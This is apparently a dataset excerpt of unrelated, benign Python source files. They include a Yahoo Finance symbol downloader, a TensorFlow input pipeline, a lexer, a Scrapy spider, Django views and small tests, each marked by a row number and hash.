    # searchassist API with progressively longer query prefixes.
    def __init__(self, type):
        # All downloaded symbols are stored in a dict before exporting
        # This is to ensure no duplicate data
        self.symbols = {}
        self.rsession = requests.Session()
        self.type = type
        self.queries = []
        self._add_queries()
        self.current_q = self.queries[0]
        self.done = False
    def _add_queries(self, prefix=''):
        # This method will add (prefix+)a...z to self.queries
        # This API requires the first character of the search to be a letter.
        # The second character can be a letter, number, dot, or equals sign.
        if len(prefix)==0:
            search_characters = first_search_characters
        else:
            search_characters = general_search_characters
        for i in range(len(search_characters)):
            element = str(prefix) + str(search_characters[i])
            if element not in self.queries: # Avoid having duplicates in list
                self.queries.append(element)
    def _encodeParams(self, params):
        # Encode params as Yahoo's matrix-style ';key=value' URL segments.
        encoded = ''
        for key, value in params.items():
            encoded += ';' + quote(key) + '=' + quote(text(value))
        return encoded
    def _fetch(self, insecure):
        # Perform one searchassist request for the current query string and
        # return the decoded JSON body; raises for HTTP error statuses.
        params = {
            'searchTerm': self.current_q,
        }
        query_string = {
            'device': 'console',
            'returnMeta': 'true',
        }
        protocol = 'http' if insecure else 'https'
        req = requests.Request('GET',
            protocol+'://finance.yahoo.com/_finance_doubledown/api/resource/searchassist'+self._encodeParams(params),
            headers={'User-agent': user_agent},
            params=query_string
        )
        req = req.prepare()
        print("req " + req.url)
        resp = self.rsession.send(req, timeout=(12, 12))
        resp.raise_for_status()
        return resp.json()
    def decodeSymbolsContainer(self, symbolsContainer):
        # Subclass hook: turn one API response into (symbols, count).
        raise Exception("Function to extract symbols must be overwritten in subclass. Generic symbol downloader does not know how.")
    def _getQueryIndex(self):
        # Position of the current query within self.queries.
        return self.queries.index(self.current_q)
    def getTotalQueries(self):
        return len(self.queries)
    def _nextQuery(self):
        # Advance to the next query, wrapping back to the first at the end.
        if self._getQueryIndex() + 1 >= len(self.queries):
            self.current_q = self.queries[0]
        else:
            self.current_q = self.queries[self._getQueryIndex() + 1]
    def nextRequest(self, insecure=False, pandantic=False):
        # Fetch the next query's results (with retries) and record symbols.
        # NOTE(review): this advances BEFORE fetching, so queries[0] looks
        # like it is never fetched -- confirm the caller compensates.
        self._nextQuery()
        success = False
        retryCount = 0
        json = None
        # Exponential back-off algorithm
        # to attempt 5 more times sleeping 5, 25, 125, 625, 3125 seconds
        # respectively.
        maxRetries = 5
        while(success == False):
            try:
                json = self._fetch(insecure)
                success = True
            except (requests.HTTPError,
                    requests.exceptions.ChunkedEncodingError,
                    requests.exceptions.ReadTimeout,
                    requests.exceptions.ConnectionError) as ex:
                if retryCount < maxRetries:
                    attempt = retryCount + 1
                    sleepAmt = int(math.pow(5,attempt))
                    print("Retry attempt: " + str(attempt) + " of " + str(maxRetries) + "."
                        " Sleep period: " + str(sleepAmt) + " seconds."
                    )
                    sleep(sleepAmt)
                    retryCount = attempt
                else:
                    raise
        (symbols, count) = self.decodeSymbolsContainer(json)
        for symbol in symbols:
            self.symbols[symbol.ticker] = symbol
        # There is no pagination with this API.
        # If we receive 10 results, we assume there are more than 10 and add another layer of queries to narrow the search further
        if(count == 10):
            self._add_queries(self.current_q)
        elif(count > 10):
            # This should never happen with this API, it always returns at most 10 items
            raise Exception("Funny things are happening: count "
                + text(count)
                + " > 10. "
                + "Content:"
                + "\n"
                + repr(json))
        if self._getQueryIndex() + 1 >= len(self.queries):
            self.done = True
        else:
            self.done = False
        return symbols
    def isDone(self):
        return self.done
    def getCollectedSymbols(self):
        return self.symbols.values()
    def getRowHeader(self):
        # Column names matching the rows produced by subclasses.
        return ["Ticker", "Name", "Exchange"]
    def printProgress(self):
        if self.isDone():
            print("Progress: Done!")
        else:
            print("Progress:"
                + " Query " + str(self._getQueryIndex()+1) + "/" + str(self.getTotalQueries()) + "."
                + "\n"
                + str(len(self.symbols)) + " unique " + self.type + " entries collected so far."
            )
            print ("")
19,724 | bc008e5cc29fdaba9d9c63e4b2ceded48cc93db5 | """DatasetInput class based on TFRecord files."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tf_trainer.common import dataset_input
from tf_trainer.common import types
from typing import Callable, Dict, List
class TFRecordInput(dataset_input.DatasetInput):
  """TFRecord based DatasetInput.
  Handles parsing of TF Examples.
  """
  def __init__(
      self,
      train_path: str,
      validate_path: str,
      text_feature: str,
      labels: Dict[str, tf.DType],
      feature_preprocessor_init: Callable[[], Callable[[str], List[str]]],
      batch_size: int = 64,
      max_seq_length: int = 300,
      round_labels: bool = True) -> None:
    self._train_path = train_path
    self._validate_path = validate_path
    self._text_feature = text_feature
    self._labels = labels
    self._batch_size = batch_size
    # NOTE(review): _max_seq_length is stored but not applied anywhere yet
    # (see the truncation TODO below) -- confirm before relying on it.
    self._max_seq_length = max_seq_length
    self.feature_preprocessor_init = feature_preprocessor_init
    self._round_labels = round_labels
  def train_input_fn(self) -> types.FeatureAndLabelTensors:
    """input_fn for TF Estimators for training set."""
    return self._input_fn_from_file(self._train_path)
  def validate_input_fn(self) -> types.FeatureAndLabelTensors:
    """input_fn for TF Estimators for validation set."""
    return self._input_fn_from_file(self._validate_path)
  def _input_fn_from_file(self, filepath: str) -> types.FeatureAndLabelTensors:
    """Build a parsed, padded-batch pipeline over one TFRecord file."""
    dataset = tf.data.TFRecordDataset(filepath)  # type: tf.data.TFRecordDataset
    # Feature preprocessor must be initialized outside of the map function
    # but inside the inpout_fn function.
    feature_preprocessor = self.feature_preprocessor_init()
    parsed_dataset = dataset.map(
        lambda x: self._read_tf_example(x, feature_preprocessor))
    # Pad the variable-length token feature to the longest example in each
    # batch; labels are scalars and need no padding.
    batched_dataset = parsed_dataset.padded_batch(
        self._batch_size,
        padded_shapes=(
            {
                # TODO: truncate to max_seq_length
                self._text_feature: [None]
            },
            {label: [] for label in self._labels}))
    # TODO: think about what happens when we run out of examples; should we be
    # using something that repeats over the dataset many time to allow
    # multi-epoch learning, or does estimator do this for us?
    itr_op = batched_dataset.make_initializable_iterator()
    # Adding the initializer operation to the graph.
    tf.add_to_collection(tf.GraphKeys.TABLE_INITIALIZERS, itr_op.initializer)
    return itr_op.get_next()
  def _read_tf_example(self,
                       record: tf.Tensor,
                       feature_preprocessor: Callable[[str], List[str]]
                      ) -> types.FeatureAndLabelTensors:
    """Parses TF Example protobuf into a text feature and labels.
    The input TF Example has a text feature as a singleton list with the full
    comment as the single element.
    """
    keys_to_features = {}
    keys_to_features[self._text_feature] = tf.FixedLenFeature([], tf.string)
    for label, dtype in self._labels.items():
      keys_to_features[label] = tf.FixedLenFeature([], dtype)
    parsed = tf.parse_single_example(
        record, keys_to_features)  # type: Dict[str, types.Tensor]
    text = parsed[self._text_feature]
    # I think this could be a feature column, but feature columns seem so beta.
    preprocessed_text = feature_preprocessor(text)
    features = {self._text_feature: preprocessed_text}
    # Optionally binarise soft labels (e.g. 0.7 -> 1.0) for classification.
    if self._round_labels:
      labels = {label: tf.round(parsed[label]) for label in self._labels}
    else:
      labels = {label: parsed[label] for label in self._labels}
    return features, labels
19,725 | 16b17def83f4b0c669bbd0f54183403f81bb4221 | #!/usr/bin/env python2.7
# coding: utf-8
import logging
import os
import sys
from logging.config import dictConfig
from multiprocessing import active_children
from time import sleep
from lib import utils
from lib.utils import (check_network_status, create_pidfile, daemonize,
load_config_from_pyfile, parse_cmd_args, spawn_workers)
from lib.worker import worker
from tests import my_mocked_method_for_test
logger = logging.getLogger('redirect_checker')
def condition_is_true():
    """Guard for main_loop's while; always True here — presumably a seam so
    tests can stop the loop by patching this function (TODO confirm)."""
    return True
def create_workers(config, parent_pid):
    """Top the worker pool back up to config.WORKER_POOL_SIZE children."""
    missing = config.WORKER_POOL_SIZE - len(active_children())
    if missing <= 0:
        # Pool already full; test hook records that nothing was spawned.
        my_mocked_method_for_test('full_pool')
        return
    logger.info('Spawning {} workers'.format(missing))
    spawn_workers(
        num=missing,
        target=worker,
        args=(config,),
        parent_pid=parent_pid
    )
def remove_workers():
    """Terminate every live child worker (network considered down)."""
    logger.critical('Network is down. stopping workers')
    for child in active_children():
        child.terminate()
def main_loop(config):
    """Supervise the worker pool until condition_is_true() stops returning True.

    Each tick: if the check URL is reachable, top the pool up to
    WORKER_POOL_SIZE; otherwise terminate all workers.  Sleeps
    config.SLEEP seconds between ticks.
    """
    logger.info(
        u'Run main loop. Worker pool size={}. Sleep time is {}.'.format(
            config.WORKER_POOL_SIZE, config.SLEEP
        ))
    parent_pid = os.getpid()
    while condition_is_true():
        if check_network_status(config.CHECK_URL, config.HTTP_TIMEOUT):
            create_workers(config, parent_pid)
        else:
            remove_workers()
        sleep(config.SLEEP)
def main(argv):
    """Parse CLI args, load the config and run the supervisor loop."""
    parsed = parse_cmd_args(argv[1:])
    cfg = utils.get_config_with_args(parsed)
    main_loop(cfg)
    return cfg.EXIT_CODE
if __name__ == '__main__':
    # Propagate the config-defined exit code to the shell.
    sys.exit(main(sys.argv))
|
19,726 | e8700b62b622bf4eb0d2f4edc3a274e9346ef6c9 | """
Cross sum
"""
import numpy as np
from .dimensionalize import dimensionalize
from .augmentor import _Augmentor
@dimensionalize
def cross_sum(X, Y=None, inds=None):
    """Sum cross given time series.
    Time series will be summed with others based on the given indices. Time
    points at which at least one time series of summation is anomalous will be
    marked as anomalous.
    Parameters
    ----------
    X : numpy.ndarray
        Time series to be augmented. Matrix with shape (n,), (N, n) or (N, n,
        c), where n is the length of each series, N is the number of series,
        and c is the number of channels.
    Y : numpy.ndarray, optional
        Binary labels of time series, where 0 represents a normal point and 1
        represents an anomalous points. Matrix with shape (n,), (N, n) or (N,
        n, cl), where n is the length of each series, N is the number of
        series, and cl is the number of classes (i.e. types of anomaly).
        Default: None.
    inds : numpy.array, optional
        Indices of time series to sum with. Matrix with shape (N, m), where N
        is the number of series, and m is the maximal number of series to sum
        with each series. The i-th output series is the sum of the i-th input
        series and the ind[i][j]-th time series for all j. Values of ind[i][j]
        can be NaN for series to be summed with less than m series.
    Returns
    -------
    tuple (numpy.ndarray, numpy.ndarray)
        Augmented time series and augmented labels (if argument `Y` exists).
    """
    N, n, c = X.shape
    if inds is None:
        inds = np.zeros((N, 0))
    if inds.ndim == 1:
        inds = inds.reshape((N, 1))
    if inds.shape[0] != N:
        raise ValueError("Wrong shape of inds")
    m = inds.shape[1]
    X_aug = X.copy()
    Y_aug = None if Y is None else Y.copy()
    for k in range(m):
        # Only rows with a real (non-NaN) partner index take part in this
        # round of summation.  The previous mask `np.isnan(...) >= 0` was
        # always True (booleans compare >= 0), so NaN entries were never
        # filtered and the float/NaN fancy-indexing below would fail.
        valid = ~np.isnan(inds[:, k])
        partners = inds[valid, k].astype(int)
        X_aug[valid] = X_aug[valid] + X[partners]
        if Y is not None:
            Y_aug[valid] = Y_aug[valid] + Y[partners]
    if Y is not None:
        # A point is anomalous if it is anomalous in ANY of the summed series.
        Y_aug = (Y_aug >= 1).astype(int)
    return X_aug, Y_aug
@dimensionalize
def random_cross_sum(X, Y=None, max_sum_series=5, random_seed=None):
    """Sum cross given time series randomly.
    Time series will be summed with others randomly. Time points at which at
    least one time series of summation is anomalous will be marked as
    anomalous.
    Parameters
    ----------
    X : numpy.ndarray
        Time series to be augmented. Matrix with shape (n,), (N, n) or (N, n,
        c), where n is the length of each series, N is the number of series,
        and c is the number of channels.
    Y : numpy.ndarray, optional
        Binary labels of time series, where 0 represents a normal point and 1
        represents an anomalous points. Matrix with shape (n,), (N, n) or (N,
        n, cl), where n is the length of each series, N is the number of
        series, and cl is the number of classes (i.e. types of anomaly).
        Default: None.
    max_sum_series : int, optinonal
        Maximal number of time series to cross sum. Default: 5.
    random_seed : int, optional
        Random seed used to initialize the pseudo-random number generator.
        Default: None.
    Returns
    -------
    tuple (numpy.ndarray, numpy.ndarray)
        Augmented time series and augmented labels (if argument `Y` exists).
    """
    N, n, c = X.shape
    rand = np.random.RandomState(random_seed)
    # NOTE(review): choice over range(-1, N) can draw -1, which indexes the
    # LAST series via Python negative indexing when passed to cross_sum --
    # confirm whether -1 was intended as a "no partner" sentinel instead.
    inds = rand.choice(range(-1, N), size=(N, max_sum_series))
    return cross_sum(X, Y, inds)
class CrossSum(_Augmentor):
    """Augmentor that sum cross given time series.
    Time series will be summed with others based on the given indices. Time
    points at which at least one time series of summation is anomalous will be
    marked as anomalous.
    Parameters
    ----------
    inds : numpy.array, optional
        Indices of time series to sum with. Matrix with shape (N, m), where N
        is the number of series, and m is the maximal number of series to sum
        with each series. The i-th output series is the sum of the i-th input
        series and the ind[i][j]-th time series for all j. Values of ind[i][j]
        can be NaN for series to be summed with less than m series.
    """
    def __init__(self, inds=None):
        # Deterministic wrapper: delegates the actual work to cross_sum.
        super().__init__(augmentor_func=cross_sum, is_random=False, inds=inds)
    @property
    def inds(self):
        """Index matrix forwarded to cross_sum on each call."""
        return self._params["inds"]
    @inds.setter
    def inds(self, inds):
        self._params["inds"] = inds
class RandomCrossSum(_Augmentor):
    """Augmentor that sums cross given time series randomly.
    Time series will be summed with others randomly. Time points at which at
    least one time series of summation is anomalous will be marked as
    anomalous.
    Parameters
    ----------
    max_sum_series : int, optinonal
        Maximal number of time series to cross sum. Default: 5.
    random_seed : int, optional
        Random seed used to initialize the pseudo-random number generator.
        Default: None.
    """
    def __init__(self, max_sum_series=5, random_seed=None):
        # Randomized wrapper: delegates the work to random_cross_sum.
        super().__init__(
            augmentor_func=random_cross_sum,
            is_random=True,
            max_sum_series=max_sum_series,
            random_seed=random_seed,
        )
    @property
    def max_sum_series(self):
        """Maximal number of series each series is summed with."""
        return self._params["max_sum_series"]
    @max_sum_series.setter
    def max_sum_series(self, max_sum_series):
        self._params["max_sum_series"] = max_sum_series
    @property
    def random_seed(self):
        """Seed for the internal RandomState (None means nondeterministic)."""
        return self._params["random_seed"]
    @random_seed.setter
    def random_seed(self, random_seed):
        self._params["random_seed"] = random_seed
19,727 | 6e2b4cd09a3a22c02ce5f8dd808cd2c1d87340be | from future import standard_library
standard_library.install_aliases()
import os
import tempfile
import urllib.request
from cumulusci.core.exceptions import CumulusCIException
from cumulusci.tasks.command import Command
class GenerateApexDocs(Command):
    """ Generate Apex documentation from local code """
    # Upstream repo the apexdoc.jar release artifact is downloaded from.
    apexdoc_repo_url = "https://github.com/SalesforceFoundation/ApexDoc"
    jar_file = "apexdoc.jar"
    task_options = {
        "tag": {
            "description": "The tag to use for links back to the repo. If "
            + "not provided, source_url arg to ApexDoc is omitted."
        },
        "source_directory": {
            "description": "The folder location which contains your apex "
            + ".cls classes. default=<RepoRoot>/src/classes/"
        },
        "out_dir": {
            "description": "The folder location where documentation will be "
            + "generated to. Defaults to project config value "
            + "project/apexdoc/dir if present, otherwise uses repo root."
        },
        "home_page": {
            "description": "The full path to an html file that contains the "
            + "contents for the home page's content area. Defaults to project "
            + "config value project/apexdoc/homepage if present, otherwise is "
            + "not used."
        },
        "banner_page": {
            "description": "The full path to an html file that contains the "
            + "content for the banner section of each generated page. "
            + "Defaults to project config value project/apexdoc/banner if "
            + "present, otherwise is not used."
        },
        "scope": {
            "description": "A semicolon separated list of scopes to "
            + "document. Defaults to project config value "
            + "project/apexdoc/scope if present, otherwise allows ApexDoc to "
            + "use its default (global;public;webService)."
        },
        "version": {
            "description": "Version of ApexDoc to use. Defaults to project "
            + "config value project/apexdoc/version."
        },
    }
    def _init_options(self, kwargs):
        """Fill unset options from project config; 'version' is mandatory.

        'command' stays None here and is assembled in _run_task once the
        jar has been staged.
        """
        super(GenerateApexDocs, self)._init_options(kwargs)
        self.options["command"] = None
        if "source_directory" not in self.options:
            self.options["source_directory"] = os.path.join(
                self.project_config.repo_root, "src", "classes"
            )
        if "out_dir" not in self.options:
            self.options["out_dir"] = (
                self.project_config.project__apexdoc__dir
                if self.project_config.project__apexdoc__dir
                else self.project_config.repo_root
            )
        if "tag" not in self.options:
            self.options["tag"] = None
        if "home_page" not in self.options:
            self.options["home_page"] = (
                self.project_config.project__apexdoc__homepage
                if self.project_config.project__apexdoc__homepage
                else None
            )
        if "banner_page" not in self.options:
            self.options["banner_page"] = (
                self.project_config.project__apexdoc__banner
                if self.project_config.project__apexdoc__banner
                else None
            )
        if "scope" not in self.options:
            self.options["scope"] = (
                self.project_config.project__apexdoc__scope
                if self.project_config.project__apexdoc__scope
                else None
            )
        if "version" not in self.options:
            if not self.project_config.project__apexdoc__version:
                raise CumulusCIException("ApexDoc version required")
            self.options["version"] = self.project_config.project__apexdoc__version
    def _init_task(self):
        """Create a temp working dir for the jar; validate repo URL if tagging."""
        super(GenerateApexDocs, self)._init_task()
        self.working_dir = tempfile.mkdtemp()
        self.jar_path = os.path.join(self.working_dir, self.jar_file)
        if self.options["tag"] and not self.project_config.project__git__repo_url:
            raise CumulusCIException("Repo URL not found in cumulusci.yml")
    def _run_task(self):
        """Download the jar, assemble the java command line and run it."""
        self._get_jar()
        cmd = "java -jar {} -s {} -t {}".format(
            self.jar_path, self.options["source_directory"], self.options["out_dir"]
        )
        if self.options["tag"]:
            # -g makes ApexDoc link each class back to its source on GitHub.
            cmd += " -g {}/blob/{}/src/classes/".format(
                self.project_config.project__git__repo_url, self.options["tag"]
            )
        if self.options["home_page"]:
            cmd += " -h {}".format(self.options["home_page"])
        if self.options["banner_page"]:
            cmd += " -a {}".format(self.options["banner_page"])
        if self.options["scope"]:
            cmd += ' -p "{}"'.format(self.options["scope"])
        self.options["command"] = cmd
        self._run_command({})
    def _get_jar(self):
        """Download the release jar for the configured version into jar_path."""
        url = "{}/releases/download/{}/{}".format(
            self.apexdoc_repo_url, self.options["version"], self.jar_file
        )
        urllib.request.urlretrieve(url, self.jar_path)
19,728 | 41a26a6eb10448b066027b0e7cf99c77d679fd03 | import logging
from cloud_scanner.contracts import Resource, ResourceStorageFactory
class ResourceStorage:
    """Store resources from scanning."""
    @staticmethod
    def process_queue_message(message):
        """Receives resources from queue and stores in registered service.

        :param message: Payload of resources to store
        :return: Number of resources stored in service
        """
        storage = ResourceStorageFactory.create()
        parsed = _parse_resources(message)
        storage.write_entries(parsed)
        return len(parsed)
def _parse_resources(message):
    """Parse message from queue as JSON of resources.

    :param message: JSON of resources
    :return: Deserialized list of Resource objects
    """
    payload = message.get_json()
    if not isinstance(payload, list):
        # Normalise a single resource into a one-element list.
        payload = [payload]
    logging.info(f"Found {len(payload)} resources to process")
    return [Resource(entry) for entry in payload]
19,729 | 9fc901f099b87b5afd6b1203995577fda7195f76 |
from tests.BaseTestCase import BaseTestCase
from workflow_ignitor.issue.Issue import Issue
class testIssue( BaseTestCase ):
	"""Unit tests for Issue construction and the exists() predicate."""
	def testConstructorPositional( self ):
		'''
		Tests constructor using only positional arguments.
		'''
		instance = Issue( 'foo', 'bar' )
		self.assertEqual( 'foo', instance.title, 'Invalid title' )
		self.assertEqual( 'bar', instance.descr, 'Invalid description' )
	def testConstructorKeywords( self ):
		'''
		Tests constructor using keyword arguments.
		'''
		instance = Issue( 'foo', descr = 'bar' )
		self.assertEqual( 'foo', instance.title, 'Invalid title' )
		self.assertEqual( 'bar', instance.descr, 'Invalid description' )
	def testExists( self ):
		'''
		Tests that an issue with an id reports itself as existing.
		'''
		instance = Issue( 'foo', id = 11000 )
		self.assertTrue( instance.exists(), 'Invalid ret value' )
	def testExistsInvalid( self ):
		'''
		Tests that an issue without an id reports itself as not existing.
		'''
		instance = Issue( 'foo' )
		self.assertFalse( instance.exists(), 'Invalid ret value' )
19,730 | 4fe48220ec27703036be75c0a4672e8df18b245c | # -*- coding: utf-8 -*-
import scrapy
from joke.items import JokeItem
class JokesSpider(scrapy.Spider):
    """Crawl joke summaries from xiaohua.zol.com.cn, pages 0 through 2."""
    name = 'jokes'
    allowed_domains = ['xiaohua.zol.com.cn']
    baseURL = "http://xiaohua.zol.com.cn/new/"
    offset = 0
    start_urls = [baseURL+str(offset)+".html"]
    # (item field, xpath relative to one article node); a field is only set
    # when the xpath matches, mirroring the original per-field guards.
    _FIELD_XPATHS = [
        ('title', "./span[@class='article-title']/a/text()"),
        ('source', "./div[@class='article-source']/a/text()"),
        ('sourceUrl', "./div[@class='article-source']/a/@href"),
        ('content', "./div[@class='summary-text']/text()"),
        ('DetailsText', "./div[@class='article-commentbar articleCommentbar clearfix']/a/@href"),
        ('like', "./div[@class='article-commentbar articleCommentbar clearfix']/div[@class='good-btn-box vote-btn']/em/span/text()"),
    ]
    def parse(self, response):
        """Yield one JokeItem per article summary, then request the next page."""
        for node in response.xpath("//li[@class='article-summary']"):
            item = JokeItem()
            for field, xpath in self._FIELD_XPATHS:
                matches = node.xpath(xpath).extract()
                if matches:
                    item[field] = matches[0]
            yield item
        # Follow pagination up to offset 2 (three pages total).
        if self.offset < 2:
            self.offset += 1
            url = self.baseURL + str(self.offset) + ".html"
            yield scrapy.Request(url, callback=self.parse)
19,731 | 8ac9426a1b31374412ef24cdcad29caf08d187c1 | # !/usr/bin/env python3
# -*- encoding: utf-8 -*-
"""
ERP+
"""
__author__ = ['António Anacleto', 'Jair Medina', 'Abner Oliveira']
__credits__ = []
__version__ = "1.0"
__maintainer__ = ['António Anacleto', 'Jair Medina', 'Jair Medina', 'Abner Oliveira']
__status__ = "Development"
__model_name__= 'mapa_gestao.MapaGestao'
#import base_models#auth,
from orm import *
from form import *
class MapaGestao(Model, View):
    """Management-report ('Mapa Gestão') model/view for the ERP+ framework."""
    def __init__(self, **kargs):
        """Configure model metadata, workflow, permissions and form fields."""
        Model.__init__(self, **kargs)
        self.__name__ = 'mapa_gestao'
        self.__title__= 'Mapa Gestão'
        self.__model_name__ = __model_name__
        self.__list_edit_mode__ = 'edit'
        # Workflow: state field name plus the actions available per state.
        self.__workflow__ = (
            'estado', {'Rascunho':['Imprimir', 'Valores0', 'Imp.Excel', 'Imp.Primavera', 'Imp.PHC'], 'Confirmado':['Imprimir']}
            )
        # Which user groups may trigger each workflow action/state.
        self.__workflow_auth__ = {
            'Imprimir':['All'],
            'Valores0':['All'],
            'Imp.Excel':['All'],
            'Imp.PHC':['All'],
            'Imp.Primavera':['All'],
            'Rascunho':['Gestor'],
        }
        # Form fields, ordered by view_order.
        self.nif = string_field(view_order=1, name='Nif', size=80)
        self.ano_fiscal = string_field(view_order=2, name='Ano Fiscal', size=5)
        self.estado = info_field(view_order=3, name ='Estado', default='Rascunho', onlist=False, hidden=True, nolabel=True,)
        # NOTE(review): default 'Praia' is not one of the declared options -- confirm intended default.
        self.mapa = combo_field(view_order=4, name ='Mapa', options=[('balancete','Balancete'), ('balanco','Balanço'), ('demonst_resul','Demonstração de Resultado'), ('fluxoCaixa','Fluxo de Caixa')], onlist=False, default='Praia')
        self.linha_mapa_gestao = list_field(view_order = 5, name = 'Valores', model_name = 'linha_mapa_gestao.LinhaMapaGestao', condition = "factura_cli='{id}'", list_edit_mode = 'inline', onlist = False)
|
19,732 | 20847826d8f61e19a1bd4511796ef5ad9127ba1c | #lexer class
import enum, sys
class Lexer:
    """Turns raw source text into Token objects, one get_token() call at a time."""
    def __init__(self, source):
        # initialize cursors and adding \n to the source to make it easier to parse
        self.source = source + '\n'
        self.cur_char = ''      # character currently under the cursor
        self.cur_pos = -1       # index into self.source; -1 so next_char() lands on 0
        self.next_char()
    # Process next char
    def next_char(self):
        """Advance the cursor; cur_char becomes '\\0' at end of input."""
        self.cur_pos += 1
        if self.cur_pos >= len(self.source):
            self.cur_char = '\0' # EOF
        else:
            self.cur_char = self.source[self.cur_pos]
    # Return lookahead char
    def peek(self):
        """Return the next character without consuming it ('\\0' at EOF)."""
        if self.cur_pos + 1 >= len(self.source):
            return '\0'
        return self.source[self.cur_pos+1]
    # Invalid Token
    def abort(self, message):
        """Stop the whole process with a lexing error message."""
        sys.exit('Lexing error. ' + message)
    # Skip Whitespace
    def skip_white_space(self,):
        """Consume spaces, tabs and carriage returns (newlines are tokens)."""
        while self.cur_char == ' ' or self.cur_char == '\t' or self.cur_char == '\r':
            self.next_char()
    # Skip Comments
    def skip_comment(self,):
        """Consume a '#' comment up to (but not including) the newline."""
        if self.cur_char == '#':
            while self.cur_char != '\n':
                self.next_char()
    # Return next token
    def get_token(self,):
        """Classify the text at the cursor and return the next Token.

        Single- and two-character operators are matched first, then strings,
        numbers and identifiers/keywords. Unknown characters abort.
        """
        self.skip_white_space()
        self.skip_comment()
        if self.cur_char == '+':
            token = Token(self.cur_char, Token_Type.PLUS)
        elif self.cur_char == '-':
            token = Token(self.cur_char, Token_Type.MINUS)
        elif self.cur_char == '*':
            token = Token(self.cur_char, Token_Type.ASTERISK)
        elif self.cur_char == '/':
            token = Token(self.cur_char, Token_Type.SLASH)
        elif self.cur_char == '\n':
            token = Token(self.cur_char, Token_Type.NEWLINE)
        elif self.cur_char == '\0':
            token = Token(self.cur_char, Token_Type.EOF)
        elif self.cur_char == "=":
            # Peek to distinguish '==' from '='.
            if self.peek() == '=':
                last_char = self.cur_char
                self.next_char()
                token = Token(last_char+self.cur_char, Token_Type.EQEQ)
            else:
                token = Token(self.cur_char, Token_Type.EQ)
        elif self.cur_char == '>':
            if self.peek() == '=':
                last_char = self.cur_char
                self.next_char()
                token = Token(last_char+self.cur_char, Token_Type.GTEQ)
            else:
                token = Token(self.cur_char, Token_Type.GT)
        elif self.cur_char == '<':
            if self.peek() == '=':
                last_char = self.cur_char
                self.next_char()
                token = Token(last_char+self.cur_char, Token_Type.LTEQ)
            else:
                token = Token(self.cur_char, Token_Type.LT)
        elif self.cur_char == '!':
            # '!' is only valid as part of '!='.
            if self.peek() == '=':
                last_char = self.cur_char
                self.next_char()
                token = Token(last_char+self.cur_char, Token_Type.NOTEQ)
            else:
                self.abort('Expected !=, got {}'.format(self.peek()))
        elif self.cur_char == '\"':
            # String literal: everything between double quotes.
            self.next_char()
            start_pos = self.cur_pos
            while self.cur_char != '\"':
                # No support for special character... maybe later
                if self.cur_char == '\r' or self.cur_char == '\n' or self.cur_char == '\t' or self.cur_char == '%': # Fix for pep8
                    self.abort('Illegal character in string')
                self.next_char()
            token_text = self.source[start_pos:self.cur_pos]
            token = Token(token_text, Token_Type.STRING)
        elif self.cur_char.isdigit():
            # Number literal: digits with an optional decimal part.
            start_pos = self.cur_pos
            while self.peek().isdigit():
                self.next_char()
            if self.peek() == '.':
                self.next_char()
                # A decimal point must be followed by at least one digit.
                if not self.peek().isdigit():
                    self.abort('Illegal character in number.')
                while self.peek().isdigit():
                    self.next_char()
            token_text = self.source[start_pos:self.cur_pos+1]
            token = Token(token_text, Token_Type.NUMBER)
        elif self.cur_char.isalpha():
            # Identifier or keyword: leading letter, then alphanumerics.
            start_pos = self.cur_pos
            while self.peek().isalnum():
                self.next_char()
            token_text = self.source[start_pos:self.cur_pos+1]
            keyword = Token.check_keyword(token_text)
            if keyword is None:
                token = Token(token_text, Token_Type.IDENT)
            else:
                token = Token(token_text, keyword)
        else:
            # Unknown character: abort.
            self.abort('Unkown token: {}'.format(self.cur_char))
        self.next_char()
        return token
#token class
class Token:
    """A lexeme paired with its Token_Type classification."""

    def __init__(self, token_text, token_kind):
        self.text = token_text
        self.kind = token_kind

    @staticmethod
    def check_keyword(token_text:str):
        '''
        token_text: str, identifier text
        returns
        Token_Type: the matching keyword kind, or None if token_text
        is not a keyword (keywords occupy the value range [100, 200)).
        '''
        matches = (kind for kind in Token_Type
                   if kind.name == token_text and 100 <= kind.value < 200)
        return next(matches, None)
class Token_Type(enum.Enum):
    """Token categories.

    The numeric value encodes the class of token: negatives/zero/single
    digits are structural and literal kinds, 1xx are language keywords
    (Token.check_keyword relies on the [100, 200) range), and 2xx are
    operators. Do not renumber.
    """
    EOF = -1
    NEWLINE = 0
    NUMBER = 1
    IDENT = 2
    STRING =3
    # KEYWORD
    LABEL = 101
    GOTO = 102
    PRINT = 103
    INPUT = 104
    LET = 105
    IF = 106
    THEN = 107
    ENDIF = 108
    WHILE = 109
    REPEAT = 110
    ENDWHILE = 111
    # OPERATORS
    EQ = 201
    PLUS = 202
    MINUS = 203
    ASTERISK = 204
    SLASH = 205
    EQEQ = 206
    NOTEQ = 207
    LT = 208
    LTEQ = 209
    GT = 210
    GTEQ = 211
|
19,733 | 6577749390f10da272263acf8b2fd573fe14ceb5 | from django.core import serializers
from django.shortcuts import render, get_object_or_404
from django.urls import reverse
from django.http import JsonResponse
from . import models
def home(request):
    """Render the home page with the full list of Business objects."""
    return render(request, "business01/home.html", {
        'businesses': models.Business.objects.all(),
    })
def business_list(request):
    """Render the list page with the full list of Business objects."""
    return render(request, "business01/list.html", {
        'businesses': models.Business.objects.all(),
    })
def business(request, pk):
    """Render the detail page for one Business; raises Http404 when pk is unknown."""
    business = get_object_or_404(models.Business.objects, id=pk)
    context = {
        'business' : business,
    }
    return render(request, "business01/business_detail.html", context)
def api(request):
    """JSON endpoint returning every Business serialized via its to_json().

    The original read request.GET.get('business') into a local that was
    never used; the dead read is removed (the endpoint never filtered).
    """
    businesses = models.Business.objects.all()
    data = {
        "businesses": [w.to_json() for w in businesses],
    }
    return JsonResponse(data)
|
19,734 | b6e3c4ada4b9b37dc29ad214779df4bbeceab5a5 | from tests.helpers.mock_response import MockResponse
def mocked_success_get(*args, **kwargs):
    """Stand-in for an HTTP GET returning a canned 200 article payload.

    The payload mirrors the GraphQL response shape the code under test
    expects (result.data.allContentstackArticles.nodes with one article).
    Accepts and ignores any arguments so it can replace the real getter.
    """
    raw_response = {
        "result": {
            "data": {
                "allContentstackArticles": {
                    "nodes": [
                        {
                            "banner": {
                                "url": "https://example.com"
                            },
                            "date": "2020-11-25T12:00:00.000Z",
                            "description": "Random Description",
                            "title": "Random Title",
                            "id": "Random Id",
                            "external_link": "",
                            "url": {
                                "url": "/news/random-post/"
                            }
                        }
                    ]
                }
            }
        }
    }
    return MockResponse(raw_response, 200)
|
19,735 | 4d4497ae246cc9dcbb1cc3a677e2281a2e61224d | import math
import Statistic as st
